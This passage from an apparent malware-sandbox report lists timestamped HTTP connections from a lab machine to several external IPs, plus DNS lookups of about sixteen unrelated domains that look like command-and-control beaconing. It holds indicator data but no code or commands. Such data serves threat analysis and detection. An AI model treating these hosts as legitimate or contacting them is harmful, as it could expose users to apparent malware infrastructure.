                                                    Jun 9, 2024 18:01:57.548171997 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:57.548368931 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:57.550462008 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:57.555404902 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:57.555588961 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.227813959 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.227834940 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.227852106 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.227880955 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.227885008 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:58.227919102 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:58.230165958 CEST804974323.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:01:58.230217934 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:59.054559946 CEST4974380192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.076669931 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.081789017 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:00.081877947 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.085303068 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.090152979 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:00.753556967 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:00.753591061 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:00.753706932 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.755645037 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:00.755697966 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.759160042 CEST4974480192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:02:00.766550064 CEST804974423.227.38.74192.168.2.11
                                                    Jun 9, 2024 18:02:06.173976898 CEST4974580192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:06.178977013 CEST804974534.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:06.179053068 CEST4974580192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:06.181360960 CEST4974580192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:06.186261892 CEST804974534.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:06.957585096 CEST804974534.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:06.959424973 CEST804974534.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:06.961755991 CEST4974580192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:07.695631027 CEST4974580192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:08.713576078 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:08.855288029 CEST804974634.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:08.859790087 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:08.859790087 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:08.864854097 CEST804974634.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:09.645539045 CEST804974634.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:09.645685911 CEST804974634.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:09.645768881 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:09.647541046 CEST804974634.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:09.647707939 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:10.366959095 CEST4974680192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:11.385369062 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:11.390919924 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:11.391243935 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:11.395791054 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:11.404218912 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:11.404223919 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:12.174079895 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:12.176837921 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:12.176878929 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:12.178553104 CEST804974734.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:12.178595066 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:12.898016930 CEST4974780192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:13.927534103 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:13.934741974 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:13.934855938 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:13.937263012 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:13.944279909 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.734581947 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.734642982 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.734678984 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.734715939 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.734714031 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:14.734802008 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:14.755141020 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.755176067 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.755285025 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:14.755697966 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:14.755750895 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:14.758644104 CEST4974880192.168.2.1134.111.148.214
                                                    Jun 9, 2024 18:02:14.763600111 CEST804974834.111.148.214192.168.2.11
                                                    Jun 9, 2024 18:02:19.835361004 CEST4974980192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:19.840349913 CEST8049749217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:19.840430021 CEST4974980192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:19.842185020 CEST4974980192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:19.847111940 CEST8049749217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:20.479007006 CEST8049749217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:20.499870062 CEST8049749217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:20.499998093 CEST4974980192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:21.357516050 CEST4974980192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:22.369752884 CEST4975080192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:22.374878883 CEST8049750217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:22.374982119 CEST4975080192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:22.376936913 CEST4975080192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:22.381954908 CEST8049750217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:23.022701025 CEST8049750217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:23.043725967 CEST8049750217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:23.043898106 CEST4975080192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:23.882514954 CEST4975080192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:24.901231050 CEST4975180192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:24.906311035 CEST8049751217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:24.909948111 CEST4975180192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:24.913691044 CEST4975180192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:24.918694973 CEST8049751217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:24.918813944 CEST8049751217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:25.558496952 CEST8049751217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:25.588475943 CEST8049751217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:25.588606119 CEST4975180192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:26.413737059 CEST4975180192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:27.432291985 CEST4975280192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:27.437830925 CEST8049752217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:27.438290119 CEST4975280192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:27.441648006 CEST4975280192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:27.446872950 CEST8049752217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:28.083786011 CEST8049752217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:28.104707003 CEST8049752217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:28.104831934 CEST4975280192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:28.105750084 CEST4975280192.168.2.11217.196.55.202
                                                    Jun 9, 2024 18:02:28.110646009 CEST8049752217.196.55.202192.168.2.11
                                                    Jun 9, 2024 18:02:49.572139025 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:49.577136040 CEST8049753104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:49.581757069 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:49.584657907 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:49.590048075 CEST8049753104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:50.331880093 CEST8049753104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:50.382313967 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:50.600693941 CEST8049753104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:50.600832939 CEST8049753104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:50.600828886 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:50.600944042 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:51.085678101 CEST4975380192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:52.105434895 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:52.111426115 CEST8049754104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:52.111500978 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:52.114195108 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:52.119764090 CEST8049754104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:52.845716953 CEST8049754104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:52.899884939 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:52.902157068 CEST8049754104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:52.907661915 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:53.617680073 CEST4975480192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:54.651762962 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:54.656913996 CEST8049755104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:54.657000065 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:54.660970926 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:54.666008949 CEST8049755104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:54.666049957 CEST8049755104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:55.405416012 CEST8049755104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:55.460927010 CEST8049755104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:55.460987091 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:55.461024046 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:56.163647890 CEST4975580192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:57.249730110 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:57.254750967 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:57.261682034 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:57.277683973 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:57.282634974 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:58.219666004 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:58.219706059 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:58.219886065 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:58.275111914 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:02:58.275300026 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:58.276415110 CEST4975680192.168.2.11104.206.198.212
                                                    Jun 9, 2024 18:02:58.281359911 CEST8049756104.206.198.212192.168.2.11
                                                    Jun 9, 2024 18:03:03.313374043 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:03.318344116 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:03.318723917 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:03.320683002 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:03.325634003 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.231846094 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.231864929 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.231878042 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.231888056 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.231945038 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:04.381369114 CEST8049757194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:04.381566048 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:04.835627079 CEST4975780192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:05.854290009 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:05.963850975 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:05.963948965 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:05.966167927 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:05.971170902 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:06.869708061 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:06.869774103 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:06.869813919 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:06.869849920 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:06.869921923 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:06.869921923 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:07.019045115 CEST8049758194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:07.021785975 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:07.477675915 CEST4975880192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:08.499463081 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:08.504623890 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:08.504693985 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:08.507133007 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:08.512116909 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:08.512310982 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.400669098 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.400770903 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.400814056 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.400852919 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.400913954 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:09.401102066 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:09.549818993 CEST8049759194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:09.553790092 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:10.023080111 CEST4975980192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.041678905 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.046878099 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.051254988 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.051254988 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.056250095 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949306965 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949342012 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949398994 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949455976 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.949479103 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949497938 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949512959 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949513912 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.949529886 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949546099 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949561119 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949570894 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.949577093 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:11.949608088 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:11.949620962 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:12.099297047 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:12.099462032 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:12.100506067 CEST4976080192.168.2.11194.58.112.174
                                                    Jun 9, 2024 18:03:12.105494976 CEST8049760194.58.112.174192.168.2.11
                                                    Jun 9, 2024 18:03:20.153475046 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:20.158586025 CEST8049761154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:03:20.158668995 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:20.161528111 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:20.166475058 CEST8049761154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:03:21.290488958 CEST8049761154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:03:21.335652113 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:21.553081036 CEST8049761154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:03:21.553811073 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:21.555788040 CEST4976180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 18:03:21.560672998 CEST8049761154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:03:27.666850090 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:27.671822071 CEST8049762202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:03:27.672584057 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:27.673625946 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:27.678499937 CEST8049762202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:03:28.549520969 CEST8049762202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:03:28.601088047 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:29.075242996 CEST8049762202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:03:29.075404882 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:29.075737000 CEST8049762202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:03:29.075790882 CEST4976280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:03:29.179275036 CEST4976280192.168.2.11202.172.28.202

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jun 9, 2024 17:59:49.049603939 CEST6387153192.168.2.111.1.1.1
                                                    Jun 9, 2024 17:59:49.444494963 CEST53638711.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:00:05.669600010 CEST5936453192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:00:06.182532072 CEST53593641.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:00:20.542429924 CEST5997553192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:00:20.919827938 CEST53599751.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:00:35.073977947 CEST5298353192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:00:35.100151062 CEST53529831.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:00:48.856306076 CEST5472153192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:00:48.958861113 CEST53547211.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:01:02.657613039 CEST6366053192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:01:02.671101093 CEST53636601.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:01:16.480819941 CEST5968153192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:01:16.516200066 CEST53596811.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:01:24.627156019 CEST5296053192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:01:24.649569988 CEST53529601.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:01:38.277000904 CEST6096953192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:01:38.355047941 CEST53609691.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:01:51.964962959 CEST6337253192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:01:52.321110010 CEST53633721.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:05.776236057 CEST5771253192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:06.166100025 CEST53577121.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:19.778551102 CEST4956453192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:19.832824945 CEST53495641.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:33.121023893 CEST5994253192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:33.340080023 CEST53599421.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:41.465651035 CEST5506953192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:41.479162931 CEST53550691.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:49.544126034 CEST5615853192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:49.563745022 CEST53561581.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:03:03.293694019 CEST5462753192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:03:03.310996056 CEST53546271.1.1.1192.168.2.11

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jun 9, 2024 17:59:49.049603939 CEST192.168.2.111.1.1.10x294cStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:05.669600010 CEST192.168.2.111.1.1.10x1358Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:20.542429924 CEST192.168.2.111.1.1.10xac29Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:35.073977947 CEST192.168.2.111.1.1.10x7eb8Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:48.856306076 CEST192.168.2.111.1.1.10x971cStandard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:02.657613039 CEST192.168.2.111.1.1.10x389dStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:16.480819941 CEST192.168.2.111.1.1.10x5612Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:24.627156019 CEST192.168.2.111.1.1.10xb77Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:38.277000904 CEST192.168.2.111.1.1.10xb2abStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:51.964962959 CEST192.168.2.111.1.1.10x3885Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:05.776236057 CEST192.168.2.111.1.1.10xcb1cStandard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:19.778551102 CEST192.168.2.111.1.1.10x4bc4Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:33.121023893 CEST192.168.2.111.1.1.10x8c07Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:41.465651035 CEST192.168.2.111.1.1.10xd73Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:02:49.544126034 CEST192.168.2.111.1.1.10x3cefStandard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:03:03.293694019 CEST192.168.2.111.1.1.10x6563Standard query (0)www.b301.spaceA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jun 9, 2024 17:59:49.444494963 CEST1.1.1.1192.168.2.110x294cNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:06.182532072 CEST1.1.1.1192.168.2.110x1358No error (0)www.kasegitai.tokyo202.172.28.202A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:20.919827938 CEST1.1.1.1192.168.2.110xac29No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:35.100151062 CEST1.1.1.1192.168.2.110x7eb8No error (0)www.antonio-vivaldi.mobi46.30.213.191A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:00:48.958861113 CEST1.1.1.1192.168.2.110x971cNo error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Jun 9, 2024 18:00:48.958861113 CEST1.1.1.1192.168.2.110x971cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Jun 9, 2024 18:00:48.958861113 CEST1.1.1.1192.168.2.110x971cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:02.671101093 CEST1.1.1.1192.168.2.110x389dNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:16.516200066 CEST1.1.1.1192.168.2.110x5612Server failure (2)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:24.649569988 CEST1.1.1.1192.168.2.110xb77No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                    Jun 9, 2024 18:01:38.355047941 CEST1.1.1.1192.168.2.110xb2abNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                    Jun 9, 2024 18:01:38.355047941 CEST1.1.1.1192.168.2.110xb2abNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
